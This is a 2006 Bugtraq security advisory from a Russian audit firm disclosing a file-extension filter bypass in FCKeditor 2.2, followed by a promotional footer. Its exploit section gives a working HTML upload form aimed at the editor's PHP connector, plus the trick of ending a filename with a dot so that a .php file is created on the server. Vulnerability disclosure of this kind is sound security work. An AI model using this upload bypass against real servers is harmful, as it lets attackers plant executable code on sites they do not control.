[<prev] [next>] [day] [month] [year] [list]
Message-ID: <1450.353235896$1140733276@news.gmane.org>
Date: Fri, 24 Feb 2006 00:31:43 +0300
From: NSA Group <vulnerability@...g.ru>
To: bugtraq@...urityfocus.com
Subject: NSA Group Security Advisory NSAG-№196-23.02.2006 Vulnerability FCKeditor 2.2
Advisory:
NSAG-№196-23.02.2006
Research:
NSA Group [Russian company on Audit of safety & Network security]
Site of Research:
http://www.nsag.ru or http://www.nsag.org
Product:
FCKeditor 2.2
Site of manufacturer:
http://www.fckeditor.net
The status:
19/11/2005 - Publication is postponed.
19/11/2005 - Manufacturer is notified.
21/02/2006 - Answer of the manufacturer is absent.
21/02/2006 - Publication of vulnerability.
Original Advisory:
http://www.nsag.ru/vuln/893.html
Risk:
Critical
Description:
Detour of a filtration of expansions of files is possible.
Influence:
Loading of the forbidden files on target system.
Exploit:
<form action="http://host/filemanager/browser/default/connectors/php/connector.php?Command=FileUpload&Type=File&CurrentFolder=/" method="POST" enctype="multipart/form-data">
File Upload<br>
<input id="txtFileUpload" type="file" name="NewFile">
<br>
<input type="submit" value="Upload">
</form>
In the end of a name of a loaded file to put a symbol "."(dot) (an example: testfile.php.)
As a result on a server the file testfile.php will be created
Decision:
The decision from the manufacturer is not known. Contact us and receive consultations.
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Our company is the independent auditor of the software in market IT.
At present independent audit of the software becomes the standard practice
and we suggest to make a let out product as much as possible protected from a various sort of attacks of malefactors!
www.nsag.ru
«Nemesis» © 2006
------------------------------------
Nemesis Security Audit Group © 2006.
Powered by blists - more mailing lists